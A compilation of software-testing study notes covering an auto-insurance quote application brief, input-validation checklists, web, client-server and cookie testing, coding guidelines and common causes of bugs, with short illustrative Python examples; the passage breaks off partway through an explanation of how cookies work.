
Brief information about the customer's business

The client is a leading insurance service provider in the Property and Casualty (P&C) segment.
The client plans to increase sales of auto insurance policies by selling directly to prospective
customers through the Internet channel.

Brief information about the customer's requirements


Functionality
The ‘Auto Insurance quote’ application should be able to collect information about the Internet
user, the vehicle and the drivers, and provide an online quote instantly. The information
provided by the user has to be saved locally so that the user can retrieve it later. The actual
policy will be issued by a legacy application that will be integrated with this quote application.
The integration with the legacy system and the issuing of the legal insurance policy are outside
the scope of this project.

Enterprise Resource Planning (ERP) is a computerized inventory control and production
planning system that grew out of Material Requirements Planning (MRP) systems. ERP is
a system that organizes the functions of an institution, supporting, for example, accounting,
finance, human resources and e-commerce applications through relational databases and
graphical user interfaces that unify the tasks of organizations such as corporations,
government agencies, non-profit organizations and business establishments.

CRM, or Customer Relationship Management, is an information system that integrates the
planning, scheduling and control of pre-sale and post-sale activities within a business.
CRM is a set of technologies and business strategies used to build strong
customer/client relationships. CRM analysts study stored information about customers'
habits and behaviors to create methods that increase productivity, profit and popularity.
Marketing strategies are created from data analyzed by automated CRM.

Supply chain management is a term coined in 1982 by Keith Oliver, a consultant at
the firm Booz Allen Hamilton, to describe the overall process of planning,
implementing, and controlling what goes on in the supply chain in order to satisfy
customers' needs in a quick, efficient manner. As carried out in practice, supply chain
management can involve everything from overseeing the exchange and storage of raw
materials and tracking work in process to the movement of goods
from their point of origin to the point where they will be consumed.

Guidelines while developing a software product


Strings
• empty string
• String consisting solely of white space
• String with leading or trailing white space
• syntactically legal: short and long values
• syntactically legal: semantically legal and illegal values
• syntactically illegal value: illegal characters or combinations
• Make sure to test special characters such as #, ", ', &, and <
• Make sure to test "Foreign" characters typed on international keyboards
Numbers
• empty string, if possible
• 0
• in range positive, small and large
• in range negative, small and large
• out of range positive
• out of range negative
• with leading zeros
• syntactically invalid (e.g., includes letters)
• Floating values
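The string and number cases above translate naturally into a data-driven test table. Below is a minimal Python sketch; `validate_quantity` and its 1-999 rule are hypothetical stand-ins for whatever field validator the application actually uses.

```python
def validate_quantity(raw):
    """Hypothetical field validator: accepts integers 1..999."""
    text = raw.strip()
    if not text or not text.lstrip("-").isdigit():
        return False          # empty, whitespace-only, or non-numeric
    value = int(text)
    return 1 <= value <= 999  # in-range check

# Boundary cases drawn from the checklists above: empty string, zero,
# in-range small/large, out-of-range, leading zeros, invalid characters.
cases = [
    ("",      False),  # empty string
    ("   ",   False),  # whitespace only
    ("0",     False),  # zero (below range)
    ("1",     True),   # in range, small
    ("999",   True),   # in range, large
    ("1000",  False),  # out of range positive
    ("-5",    False),  # out of range negative
    ("007",   True),   # leading zeros
    ("12a",   False),  # syntactically invalid
]
for raw, expected in cases:
    assert validate_quantity(raw) == expected, raw
```

Keeping the cases in a table like this makes it cheap to add a new boundary value whenever a bug is found.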
Identifiers
• empty string
• syntactically legal value
• syntactically legal: reference to existing ID, invalid reference
• syntactically illegal value
Radio buttons
• one item checked
• nothing checked, if possible
Check boxes
• checked
• unchecked
Drop down menus
• select each item in turn
Scrolling Lists
• select no item, if possible
• select each item in turn
• select combinations of items, if possible
• select all items, if possible
File upload
• blank
• 0 byte file
• long file
• short file name
• long file name
• syntactically illegal file name, if possible (e.g., "File With Spaces.tar.gz")
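The file upload checks can likewise be scripted. The helper below is illustrative only; the 64-character name limit and the rules themselves are assumptions, not requirements from the source.

```python
def check_upload(filename, size_bytes, max_name=64):
    """Return a list of problems found with an uploaded file.
    Thresholds and rules are illustrative only."""
    problems = []
    if not filename.strip():
        problems.append("blank file name")
    if size_bytes == 0:
        problems.append("0 byte file")
    if len(filename) > max_name:
        problems.append("file name too long")
    if " " in filename:
        problems.append("file name contains spaces")
    return problems

assert check_upload("report.pdf", 1024) == []
assert "0 byte file" in check_upload("empty.txt", 0)
assert "file name contains spaces" in check_upload("File With Spaces.tar.gz", 10)
```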
Data type
• Name (first name, last name) should contain alphabetic characters only
• Address may be alphanumeric
• Telephone/mobile numbers should follow the client's
requirement (numeric/alphanumeric)
• Check whether the phone number is allowed to contain special characters
• Password should be stored in encrypted format
• Check that the email address follows a valid format
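Data-type rules like these are usually expressed as patterns. The regular expressions below are illustrative defaults; the exact patterns (e.g., allowed phone characters) would come from the client's requirements.

```python
import re

# Illustrative field rules matching the checklist above; adjust the
# patterns to the client's actual requirements.
NAME_RE  = re.compile(r"^[A-Za-z]+$")                     # alphabetic only
ADDR_RE  = re.compile(r"^[A-Za-z0-9 ,.\-/]+$")            # alphanumeric address
PHONE_RE = re.compile(r"^\+?[0-9]{7,15}$")                # numeric, optional leading +
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]{2,}$") # basic email shape

assert NAME_RE.match("Smith")
assert not NAME_RE.match("Sm1th")
assert ADDR_RE.match("221B Baker Street")
assert PHONE_RE.match("+14155550123")
assert not PHONE_RE.match("call-me")
assert EMAIL_RE.match("user@example.com")
assert not EMAIL_RE.match("user@no-dot")
```

Note that the email pattern is deliberately loose; fully validating email addresses by regex is notoriously hard, and a "looks plausible" check plus a confirmation email is the usual practice.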
Browser Compatibility
• Check that the application runs on different browsers such as Internet
Explorer, Netscape, Mozilla, Firefox and Opera

Images
• Check the type of image (jpg, jpeg, bmp, gif)
• Maximum size
• Compatibility with other browsers
• Resolution
• Clarity of the image

Web site testing


• Consideration should be given to the interactions between HTML pages, TCP/IP
communications, Internet connections, firewalls, applications that run in web pages (such as
applets, JavaScript, plug-in applications), and applications that run on the server side (such as
CGI scripts, database interfaces, logging applications, dynamic page generators, ASP, etc.).
• There are a wide variety of servers and browsers, various versions of each, small but
sometimes significant differences between them, variations in connection speeds, rapidly
changing technologies, and multiple standards and protocols.
• What are the expected loads on the server (e.g., number of hits per unit time?), and what
kind of performance is required under such loads (such as web server response time,
database query response times).
• Who is the target audience? What kind of browsers will they be using? What kind of
connection speeds will they be using? Are they intra-organization (thus with likely high
connection speeds and similar browsers) or Internet-wide (thus with a wide variety of
connection speeds and browser types)?
• What kind of performance is expected on the client side (e.g., how fast should pages
appear, how fast should animations, applets, etc. load and run)?
• Will down time for server and content maintenance/upgrades be allowed? how much?
• What processes will be required to manage updates to the web site's content, and what
are the requirements for maintaining, tracking, and controlling page content, graphics,
links, etc.?
• Which HTML specification will be adhered to? How strictly? What variations will be
allowed for targeted browsers?
• Can testing be done on the production system, or will a separate test system be required?
How are browser caching, variations in browser option settings, dial-up connection
variabilities, and real-world internet 'traffic congestion' problems to be accounted for in
testing?
What is good code?
• Minimize or eliminate use of global variables.
• use descriptive function and method names - use both upper and lower case, avoid
abbreviations, use as many characters as necessary to be adequately descriptive (use of
more than 20 characters is not out of line); be consistent in naming conventions.
• use descriptive variable names - use both upper and lower case, avoid abbreviations, use
as many characters as necessary to be adequately descriptive (use of more than 20
characters is not out of line); be consistent in naming conventions.
• function and method sizes should be minimized; less than 100 lines of code is good, less
than 50 lines is preferable.
• function descriptions should be clearly spelled out in comments preceding a function's
code.
• organize code for readability.
• use whitespace generously - vertically and horizontally
• each line of code should contain 70 characters max.
• one code statement per line.
• coding style should be consistent throughout a program (e.g., use of brackets, indentations,
naming conventions, etc.)
• in adding comments, err on the side of too many rather than too few comments; a
common rule of thumb is that there should be at least as many lines of comments
(including header blocks) as lines of code.
• no matter how small, an application should include documentation of the overall
program function and flow (even a few paragraphs is better than nothing); or if possible a
separate flow chart and detailed program documentation.
• make extensive use of error handling procedures and status and error logging.
• for C++, to minimize complexity and increase maintainability, avoid too many levels of
inheritance in class hierarchies (relative to the size and complexity of the application).
Minimize use of multiple inheritance, and minimize use of operator overloading (note that
the Java programming language eliminates multiple inheritance and operator
overloading.)
• for C++, keep class methods small, less than 50 lines of code per method is preferable.
• for C++, make liberal use of exception handlers
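A short example may make the guidelines concrete. The function below is a sketch, not code from the project: the premium rule and the age range are invented for illustration, but the style follows the points above: descriptive names, a header comment, explicit error handling, and status logging.

```python
import logging

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("premium")

def calculate_annual_premium(base_rate, driver_age):
    """Compute an annual premium from a base rate and driver age.

    Illustrative only: demonstrates descriptive names, a header
    comment, explicit error handling, and status logging.
    """
    if base_rate <= 0:
        raise ValueError("base_rate must be positive")
    if not 16 <= driver_age <= 99:
        raise ValueError("driver_age out of supported range")
    # Younger drivers carry a surcharge; a simple illustrative rule.
    surcharge_factor = 1.5 if driver_age < 25 else 1.0
    premium = base_rate * surcharge_factor
    logger.info("premium computed: %.2f", premium)
    return premium
```

Compare this with a one-letter-variable, no-comment version of the same logic: both compute the same number, but only one of them survives a requirements change two years later.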

Web Design Mistakes


• Poor load time
• Poor overall appearance
• Spelling/Grammar mistakes
• No contact information
• Poor content
• Poor navigation
• Broken links and graphics
• Poor browser compatibility
• Large slow loading graphics
• Too many graphics
• Pages scrolling to oblivion
• Multiple use of animated graphics
• Animated bullets
• Too many graphic and/or line dividers
• Busy, distracting backgrounds
• Multiple banners and buttons
• Poor use of frames
• Large fonts
• Pop up messages
• Over use of Java
• Poor use of tables
• Poor organization
• Different backgrounds on each page
• Overpowering music set to autoplay
• Confusing
• Too much advertising
• Large Welcome banners
• Multiple colored text
• Text difficult to read
• No Meta tags
• Multiple use of different fonts
• Under construction signs
• Scrolling text in the status bar
• Large scrolling text across the page
• Poor use of mouse over effects
• Take your time and design your site very carefully. It may take you a little longer, but it
will be well worth the extra time in the long run.

What is Good Design


• 'Design' could refer to many things, but often refers to 'functional design' or 'internal
design'. Good internal design is indicated by software code whose overall structure is clear,
understandable, easily modifiable, and maintainable; is robust with sufficient error-
handling and status logging capability; and works correctly when implemented.
• Good functional design is indicated by an application whose functionality can be traced
back to customer and end-user requirements. The program should act in the way that least
surprises the user.
What can be done if requirements are changing continuously?
This is a common problem for organizations that expect requirements to be
pre-determined and to remain stable. When that expectation is not realistic,
here are some approaches:
• Work with the project's stakeholders early on to understand how requirements might
change so that alternate test plans and strategies can be worked out in advance, if possible.
• It's helpful if the application's initial design allows for some adaptability so that later
changes do not require redoing the application from scratch.
• If the code is well-commented and well-documented this makes changes easier for the
developers.
• Use some type of rapid prototyping whenever possible to help customers feel sure of
their requirements and minimize changes.
• The project's initial schedule should allow for some extra time commensurate with the
possibility of changes.
• Try to move new requirements to a 'Phase 2' version of an application, while using the
original requirements for the 'Phase 1' version.
• Negotiate to allow only easily-implemented new requirements into the project, while
moving more difficult new requirements into future versions of the application.
• Be sure that customers and management understand the scheduling impacts, inherent
risks, and costs of significant requirements changes. Then let management or the customers
(not the developers or testers) decide if the changes are warranted - after all, that's their
job.
• Balance the effort put into setting up automated testing against the expected effort required
to refactor the tests to deal with changes.
• Try to design some flexibility into automated test scripts.
• Focus initial automated testing on application aspects that are most likely to remain
unchanged.
• Devote appropriate effort to risk analysis of changes to minimize regression testing
needs.
• Design some flexibility into test cases (this is not easily done; the best bet might be to
minimize the detail in the test cases, or set up only higher-level generic-type test plans)
• Focus less on detailed test plans and test cases and more on ad hoc testing (with an
understanding of the added risk that this entails).

Common problems in software development


• poor requirements - if requirements are unclear, incomplete, too general, or not
testable, there will be problems.
• unrealistic schedule - if too much work is crammed in too little time, problems are
inevitable.
• inadequate testing - no one will know whether or not the program is any good until the
customer complains or systems crash.
• featuritis - requests to pile on new features after development is underway; extremely
common.
• miscommunication - if developers don't know what's needed or customers have
erroneous expectations, problems are guaranteed.
How can software development problems be overcome?
• solid requirements - clear, complete, detailed, cohesive, attainable, testable requirements
that are agreed to by all players. Use prototypes to help nail down requirements. In 'agile'-
type environments, continuous close coordination with customers/end-users is necessary.
• realistic schedules - allow adequate time for planning, design, testing, bug fixing, re-
testing, changes, and documentation; personnel should be able to complete the project
without burning out.
• adequate testing - start testing early on, re-test after fixes or changes, plan for adequate
time for testing and bug-fixing. 'Early' testing ideally includes unit testing by developers
and built-in testing and diagnostic capabilities.
• stick to initial requirements as much as possible - be prepared to defend against
excessive changes and additions once development has begun, and be prepared to explain
consequences. If changes are necessary, they should be adequately reflected in related
schedule changes. If possible, work closely with customers/end-users to manage
expectations. This will provide them a higher comfort level with their requirements
decisions and minimize excessive changes later on.
• communication - require walkthroughs and inspections when appropriate; make
extensive use of group communication tools - groupware, wikis, bug-tracking tools and
change management tools, intranet capabilities, etc.; ensure that
information/documentation is available and up-to-date - preferably electronic, not paper;
promote teamwork and cooperation; use prototypes and/or continuous communication with
end-users if possible to clarify expectations.

Why does software have bugs?


• miscommunication or no communication - as to specifics of what an application should
or shouldn't do (the application's requirements).
• software complexity - the complexity of current software applications can be difficult to
comprehend for anyone without experience in modern-day software development. Multi-
tiered applications, client-server and distributed applications, data communications,
enormous relational databases, and sheer size of applications have all contributed to the
exponential growth in software/system complexity.
• programming errors - programmers, like anyone else, can make mistakes.
• changing requirements (whether documented or undocumented) - the end-user may not
understand the effects of changes, or may understand and request them anyway - redesign,
rescheduling of engineers, effects on other projects, work already completed that may have
to be redone or thrown out, hardware requirements that may be affected, etc.
• If there are many minor changes or any major changes, known and unknown
dependencies among parts of the project are likely to interact and cause problems, and the
complexity of coordinating changes may result in errors. Enthusiasm of the engineering staff
may be affected.
• time pressures - scheduling of software projects is difficult at best, often
requiring a lot of guesswork. When deadlines loom and the crunch comes, mistakes will be
made.
• egos - people prefer to say things like:
• 'no problem'
• 'piece of cake'
• 'I can whip that out in a few hours'
• 'it should be easy to update that old code'
• poorly documented code - it's tough to maintain and modify code that is badly written or
poorly documented; the result is bugs. In many organizations management provides no
incentive for programmers to document their code or write clear, understandable,
maintainable code. In fact, it's usually the opposite: they get points mostly for quickly
turning out code, and there's job security if nobody else can understand it ('if it was hard
to write, it should be hard to read').
• software development tools - visual tools, class libraries, compilers, scripting tools, etc.
often introduce their own bugs or are poorly documented, resulting in added bugs.

What is client-server and web-based testing and how to test these applications

Projects are broadly divided into two types:

• 2 tier applications
• 3 tier applications
CLIENT / SERVER TESTING
This type of testing is usually done for 2-tier applications (usually developed for a LAN).
Here we will have a front end and a back end.
The application launched on the front end will have forms and reports that monitor and
manipulate data.

E.g.: applications developed in VB, VC++, Core Java, C, C++, D2K, PowerBuilder etc.
The back end for these applications would be MS Access, SQL Server, Oracle, Sybase, MySQL or
Quadbase.
The tests performed on these types of applications would be
- User interface testing
- Manual support testing
- Functionality testing
- Compatibility testing & configuration testing
- Intersystem testing
WEB TESTING
This is done for 3-tier applications (developed for Internet / intranet / extranet).
Here we will have a browser, a web server and a DB server.
The applications accessible in browser would be developed in HTML, DHTML, XML,
JavaScript etc. (We can monitor through these applications)

Applications for the web server would be developed in Java, ASP, JSP, VBScript, JavaScript,
Perl, Cold Fusion, PHP etc. (All the manipulations are done on the web server with the help
of these programs developed)

The DB server would be running Oracle, SQL Server, Sybase, MySQL etc. (All data is stored in
the database available on the DB server.)

The tests performed on these types of applications would be


- User interface testing
- Functionality testing
- Security testing
- Browser compatibility testing
- Load / stress testing
- Interoperability testing/intersystem testing
- Storage and data volume testing
A web-application is a three-tier application.
This has a browser (monitors data) [monitoring is done using html, dhtml, xml, javascript]-
> webserver (manipulates data) [manipulations are done using programming languages or
scripts like adv java, asp, jsp, vbscript, javascript, perl, coldfusion, php] -> database server
(stores data) [data storage and retrieval is done using databases like oracle, sql server,
sybase, mysql].
The types of tests, which can be applied on this type of applications, are:
1. User interface testing for validation & user friendliness
2. Functionality testing to validate behaviors, inputs, error handling, outputs, manipulations,
service levels, order of functionality, links, content of web pages & back-end coverage
3. Security testing
4. Browser compatibility
5. Load / stress testing
6. Interoperability testing
7. Storage & data volume testing
A client-server application is a two tier application.
This has forms & reporting at front-end (monitoring & manipulations are done) [using vb,
vc++, core java, c, c++, d2k, power builder etc.,] -> database server at the backend [data
storage & retrieval) [using ms access, sql server, oracle, sybase, mysql, quadbase etc.,]
The tests performed on these applications would be
1. User interface testing
2. Manual support testing
3. Functionality testing
4. Compatibility testing
5. Intersystem testing
Some more points to clarify the difference between client-server, web and desktop
applications:
Desktop application:
1. Application runs in single memory (Front end and Back end in one place)
2. Single user only
Client/Server application:
1. Application runs in two or more machines
2. Application is menu-driven
3. Connected mode (connection exists always until logout)
4. Limited number of users
5. Less number of network issues when compared to web app.
Web application:
1. Application runs in two or more machines
2. URL-driven
3. Disconnected mode (state less)
4. Unlimited number of users
5. Many issues like hardware compatibility, browser compatibility, version compatibility,
security issues, performance issues etc.
Another difference between the two kinds of application lies in how resources are accessed. In
client-server, once a connection is made it stays in a connected state, whereas in
web testing the HTTP protocol is stateless; this is where the logic of cookies comes in, which
client-server applications do not need.

For a client-server application the users are well known, whereas for a web application any user
can log in, access the content and use it however they intend.

So, there are always issues of security and compatibility for web application.

Web Testing: Complete guide on testing web applications
In my previous post I outlined points to be considered while testing web applications.
Here we will see some more details on web application testing, along with web testing test
cases. I always like to share practical knowledge that can be useful to readers in their
careers. This is quite a long article, so sit back and relax to get the most out of it.
Let's look at the web testing checklist first.
1) Functionality Testing
2) Usability testing
3) Interface testing
4) Compatibility testing
5) Performance testing
6) Security testing
1) Functionality Testing:
Test for – all the links in web pages, database connections, forms used in the web pages for
submitting or getting information from the user, and cookie testing.

Check all the links:


• Test the outgoing links from all the pages from specific domain under test.
• Test all internal links.
• Test links that jump within the same page.
• Test links used to send the email to admin or other users from web pages.
• Test to check if there are any orphan pages.
• Lastly in link checking, check for broken links in all above-mentioned links.
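The first step in any of these link checks is gathering every link on a page. A minimal sketch using Python's standard-library HTML parser is below; a real link checker would then issue an HTTP request per link to find the broken ones. The sample page and URLs are made up for illustration.

```python
from html.parser import HTMLParser

class LinkCollector(HTMLParser):
    """Collect href targets from anchor tags for link checking."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

# A made-up page with one internal, one external and one mailto link.
page = """<html><body>
<a href="/about.html">About</a>
<a href="https://example.com/partners">Partners</a>
<a href="mailto:admin@example.com">Contact admin</a>
</body></html>"""

collector = LinkCollector()
collector.feed(page)

# Bucket the links the way the checklist above does.
internal = [l for l in collector.links if l.startswith("/")]
external = [l for l in collector.links if l.startswith("http")]
mailto   = [l for l in collector.links if l.startswith("mailto:")]
```

Orphan-page detection is the inverse of this: crawl every page, collect every link, and report pages that no collected link points to.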
Test forms in all pages:
Forms are an integral part of any web site. Forms are used to get information from users
and to keep interacting with them. So what should be checked on these forms?
• First check all the validations on each field.
• Check for the default values of fields.
• Wrong inputs to the fields in the forms.
• Options to create, delete, view or modify forms, if any.
Let’s take the example of the search engine project I am currently working on. In this project
we have advertiser and affiliate signup steps. Each signup step is different but dependent
on the other steps, so the signup flow should execute correctly. There are different field
validations, like email IDs and user financial info validations. All these validations should be
checked in manual or automated web testing.

Cookies testing:
Cookies are small files stored on the user's machine. They are basically used to maintain
sessions, mainly login sessions. Test the application by enabling or disabling cookies in
your browser options. Test whether the cookies are encrypted before being written to the
user's machine. If you are testing session cookies (i.e. cookies that expire after the session
ends), check login sessions and user stats after the session ends. Check the effect on
application security of deleting the cookies. (I will soon write a separate article on cookie
testing.)
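One concrete cookie check is inspecting the attributes a server sets on the session cookie. The sketch below parses a hypothetical Set-Cookie header with Python's standard library; the cookie name and value are invented for illustration.

```python
from http.cookies import SimpleCookie

# A hypothetical Set-Cookie header as a login response might emit it.
header = "sessionid=abc123; Secure; HttpOnly; Path=/"

cookie = SimpleCookie()
cookie.load(header)
morsel = cookie["sessionid"]

# A login session cookie should not be readable from scripts or sent
# over plain HTTP, and no Expires/Max-Age means it dies with the session.
assert morsel.value == "abc123"
assert morsel["secure"]        # only sent over https://
assert morsel["httponly"]      # not accessible from JavaScript
assert morsel["expires"] == "" # session cookie: no fixed expiry
```

Checks like these catch the common mistake of a session token that survives browser restarts or is exposed to client-side scripts.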
Validate your HTML/CSS:
If you are optimizing your site for search engines then HTML/CSS validation is very
important. Mainly, validate the site for HTML syntax errors. Check whether the site is
crawlable by different search engines.
Database testing:
Data consistency is very important in a web application. Check for data integrity and errors
while you edit, delete or modify the forms or exercise any DB-related functionality.
Check whether all the database queries execute correctly and data is retrieved and
updated correctly. Database testing could also cover load on the DB; we will address this
under web load and performance testing below.
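The edit/delete integrity checks above can be scripted directly against the database. The sketch below uses an in-memory SQLite database as a stand-in for the application's real backend; the table and values are invented for illustration.

```python
import sqlite3

# In-memory database standing in for the application's backend.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE quotes (id INTEGER PRIMARY KEY, driver TEXT NOT NULL, premium REAL)"
)

# Simulate the form's add and edit operations, then verify that the
# stored data matches what the UI claimed to do.
conn.execute("INSERT INTO quotes (driver, premium) VALUES (?, ?)", ("Alice", 420.0))
conn.execute("UPDATE quotes SET premium = ? WHERE driver = ?", (455.0, "Alice"))
conn.commit()

row = conn.execute("SELECT premium FROM quotes WHERE driver = ?", ("Alice",)).fetchone()
assert row == (455.0,)  # the edit was persisted correctly

# Simulate the delete operation and verify it really removed the row.
conn.execute("DELETE FROM quotes WHERE driver = ?", ("Alice",))
conn.commit()
assert conn.execute("SELECT COUNT(*) FROM quotes").fetchone() == (0,)
```

Against a real backend the same pattern applies: perform the action through the UI, then query the database directly and compare.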
2) Usability Testing:
Test for navigation:
Navigation means how the user surfs the web pages: different controls like buttons and boxes,
and how the user uses the links on the pages to move between pages.
Usability testing includes:
The web site should be easy to use. Instructions should be provided clearly. Check whether the
provided instructions are correct, i.e. whether they serve their purpose.
The main menu should be provided on each page, and it should be consistent.
Content checking:
Content should be logical and easy to understand. Check for spelling errors. Dark
colors annoy users and should not be used in the site theme. You can follow the commonly
accepted standards used for web page and content building, like those I mentioned above
about annoying colors, fonts, frames etc.
Content should be meaningful. All anchor text links should work properly. Images
should be placed properly, with proper sizes.
These are some basic standards that should be followed in web development. Your task is to
validate all of this in UI testing.
Other user information for user help:
Like a search option, sitemap, help files etc. The sitemap should be present, with all the links
in the web site shown in a proper tree view of navigation. Check all the links on the sitemap.
A “search in the site” option will help users find the content pages they are looking for easily
and quickly. These are all optional items, and if present they should be validated.
3) Interface Testing:
The main interfaces are:
Web server and application server interface
Application server and Database server interface.
Check whether all interactions between these servers are executed properly and errors are
handled properly. If the database or web server returns an error message for any query from
the application server, the application server should catch it and display the error message
appropriately to users. Check what happens if the user interrupts a transaction in between.
Check what happens if the connection to the web server is reset in between.
4) Compatibility Testing:
The compatibility of your web site is a very important testing aspect. See which compatibility
tests need to be executed:
• Browser compatibility
• Operating system compatibility
• Mobile browsing
• Printing options
Browser compatibility:
In my web-testing career I have experienced this as the most influential part of web site
testing.
Some applications are very dependent on browsers. Different browsers have different
configurations and settings that your web page should be compatible with. Your web site
coding should be cross browser platform compatible. If you are using java scripts or AJAX
calls for UI functionality, performing security checks or validations then give more stress on
browser compatibility testing of your web application.
Test the web application on different browsers like Internet Explorer, Firefox, Netscape
Navigator, AOL, Safari and Opera, with different versions.
OS compatibility:
Some functionality in your web application may not be compatible with all operating
systems. New technologies used in web development, like graphics designs and interface calls
such as different APIs, may not be available in all operating systems.
Test your web application on different operating systems like Windows, Unix, Mac, Linux and
Solaris, with different OS flavors.
Mobile browsing:
This is a new technology age, so in future mobile browsing will rock. Test your web pages on
mobile browsers. Compatibility issues may exist on mobile.
Printing options:
If you are providing page-printing options then make sure fonts, page alignment and page
graphics get printed properly. Pages should fit the paper size or the size mentioned in the
printing option.
5) Performance testing:
A web application should sustain heavy load. Web performance testing should include:
Web Load Testing
Web Stress Testing
Test application performance on different internet connection speed.
In web load testing, test whether many users can access or request the same page at once. Can
the system sustain peak load times? The site should handle many simultaneous user requests,
large input data from users, simultaneous connections to the DB, heavy load on specific pages
etc.
Stress testing: Generally, stress means stretching the system beyond its specified
limits. Web stress testing is performed to break the site by applying stress and checking how
the system reacts to the stress and how it recovers from crashes.
Stress is generally applied to input fields, login and signup areas.
In web performance testing, web site functionality on different operating systems and
different hardware platforms is also checked, including checks for software and hardware
memory leakage errors.
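The shape of a basic load test can be sketched with Python's thread pool. The handler below is a stand-in that simulates server work with a short sleep; a real load test would issue HTTP requests against the site under test instead, using a dedicated load tool. The 50-request count and the 1-second threshold are illustrative assumptions.

```python
import time
from concurrent.futures import ThreadPoolExecutor

def handle_request(page):
    """Stand-in for a real page request; a load tool would issue an
    HTTP request to the site under test instead."""
    start = time.perf_counter()
    time.sleep(0.01)  # simulated server work
    return time.perf_counter() - start

# Fire 50 simultaneous "requests" and record the response times.
with ThreadPoolExecutor(max_workers=50) as pool:
    timings = list(pool.map(handle_request, ["/quote"] * 50))

# Check the 95th-percentile response time against a service-level target.
timings.sort()
p95 = timings[int(len(timings) * 0.95) - 1]
print(f"95th percentile response: {p95:.3f}s")
assert p95 < 1.0  # example threshold only
```

Reporting a percentile rather than an average matters under load: averages hide the slow tail that users actually notice.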

6) Security Testing:
Following are some test cases for web security testing:

• Test by pasting an internal URL directly into the browser address bar without logging
in. Internal pages should not open.
• If you are logged in with a username and password and browsing internal pages, then
try changing URL options directly. I.e. if you are checking some publisher site
statistics with publisher site ID=123, try directly changing the URL's site ID parameter
to a different site ID that is not related to the logged-in user. Access should be denied for
this user to view others' stats.
• Try some invalid inputs in input fields like the login username, password and input text
boxes. Check the system's reaction to all invalid inputs.
• Web directories or files should not be accessible directly unless given download
option.
• Test the CAPTCHA for automated script logins.
• Test whether SSL is used for security measures. If it is, a proper message should be
displayed when the user switches from non-secure http:// pages to secure https:// pages
and vice versa.
• All transactions, error messages and security breach attempts should be logged in log
files somewhere on the web server.
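The URL-tampering check above boils down to an ownership test on the server side. The sketch below models it with a toy in-memory ownership table; the user names and site IDs are invented, and a real application would consult its session and database instead.

```python
# Toy ownership table: which logged-in user owns which publisher site ID.
OWNERSHIP = {"user_a": {123}, "user_b": {456}}

def can_view_stats(user, site_id):
    """Deny access unless the site ID belongs to the logged-in user."""
    return site_id in OWNERSHIP.get(user, set())

# Simulates hand-editing the site ID in the URL: user_a owns site 123,
# so swapping the parameter to 456 must be refused, as must any access
# by a user who is not logged in.
assert can_view_stats("user_a", 123) is True
assert can_view_stats("user_a", 456) is False   # tampered URL parameter
assert can_view_stats("anonymous", 123) is False
```

The point of the test case is that this check must happen on the server for every request; hiding the link in the UI is not enough.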
I think I have addressed all the major web testing methods. I have worked on web testing for
around 2 years of my testing career. There are some experts who have spent their
whole careers on web testing. If I missed an important web testing aspect, let me know in the
comments below. I will keep updating the article with the latest testing information.

How can a Web site be tested?


Points to be considered while testing a Web site:
Web sites are essentially client/server applications -
with web servers and ‘browser’ clients.
Consideration should be given to the interactions between HTML pages, TCP/IP
communications, Internet connections, firewalls, applications that run in web
pages (such as applets, JavaScript, plug-in applications), and applications that run on the
server side (such as CGI scripts, database interfaces, logging applications, dynamic page
generators, ASP, etc.).
Additionally, there are a wide variety of servers and browsers, various versions of each,
small but sometimes significant differences between them, variations in connection speeds,
rapidly changing technologies, and multiple standards and protocols. The end result is that
testing for web sites can become a major ongoing effort.
Other considerations might include:
What are the expected loads on the server (e.g., number of hits per unit time?), and what
kind of performance is required under such loads (such as web server response time,
database query response times). What kinds of tools will be needed for performance testing
(such as web load testing tools, other tools already in house that can be adapted, web robot
downloading tools, etc.)?

Who is the target audience? What kind of browsers will they be using? What kind of
connection speeds will they be using? Are they intra-organization (thus with likely high
connection speeds and similar browsers) or Internet-wide (thus with a wide variety of
connection speeds and browser types)?

What kind of performance is expected on the client side (e.g., how fast should pages
appear, how fast should animations, applets, etc. load and run)?

Will down time for server and content maintenance/upgrades be allowed? How much?

What kinds of security (firewalls, encryptions, passwords, etc.) will be required and what is
it expected to do? How can it be tested?

How reliable are the site’s Internet connections required to be? And how does that affect
backup system or redundant connection requirements and testing?

What processes will be required to manage updates to the web site’s content, and
what are the requirements for maintaining, tracking, and controlling page content, graphics,
links, etc.?

Which HTML specification will be adhered to? How strictly? What variations will be allowed
for targeted browsers?

Will there be any standards or requirements for page appearance and/or graphics
throughout a site or parts of a site?

How will internal and external links be validated and updated? How often?
Can testing be done on the production system, or will a separate test system be required?
How are browser caching, variations in browser option settings, dial-up connection
variabilities, and real-world internet ‘traffic congestion’ problems to be accounted for in
testing?
How extensive or customized are the server logging and reporting requirements; are they
considered an integral part of the system and do they require testing?

How are cgi programs, applets, javascripts, ActiveX components, etc. to be maintained,
tracked, controlled, and tested?
Pages should be 3-5 screens max unless content is tightly focused on a single topic. If
larger, provide internal links within the page.
The page layouts and design elements should be consistent throughout a site, so that it’s
clear to the user that they’re still within a site.

Pages should be as browser-independent as possible, or pages should be provided or
generated based on the browser type.

All pages should have links external to the page; there should be no dead-end pages.
The page owner, revision date, and a link to a contact person or organization should be
included on each page.

Website Cookie Testing: Test cases for testing web application cookies
We will first focus on what exactly cookies are and how they work. It will be easier to
understand the test cases for testing cookies once you have a clear understanding of how
cookies work, how cookies are stored on the hard drive, and how cookie settings can be
edited.

What is a Cookie?
A cookie is a small piece of information stored in a text file on the user’s hard drive by the
web server. This information is later sent back by the web browser to identify the returning
user and machine. Generally a cookie contains personalized user data or information that is
used to communicate between different web pages.
Why are Cookies used?
Cookies carry the user’s identity and are used to track where the user has navigated
throughout the web site’s pages, because the communication between web browser and
web server is stateless.
For example, if you are accessing http://www.example.com/1.html then the web
browser will simply ask the example.com web server for the page 1.html. If you next
request http://www.example.com/2.html then a new request is sent to the example.com
web server for the 2.html page, and the web server knows nothing about whom the
previous page 1.html was served to.
What if you want the previous history of this user’s communication with the web server? You
need to maintain the user state and the interaction between web browser and web server
somewhere. This is where cookies come into the picture: they serve the purpose of
maintaining the user’s interactions with the web server.

How do cookies work?

The HTTP protocol used to exchange information files on the web is itself stateless: it does
not keep any record of previously accessed web pages. Cookies are the mechanism, layered
on top of HTTP, that keeps a record of previous web browser and web server interactions,
and it is cookies that are used to maintain the user’s state across requests.
Whenever a user visits a site or page that uses cookies, a small piece of code inside that
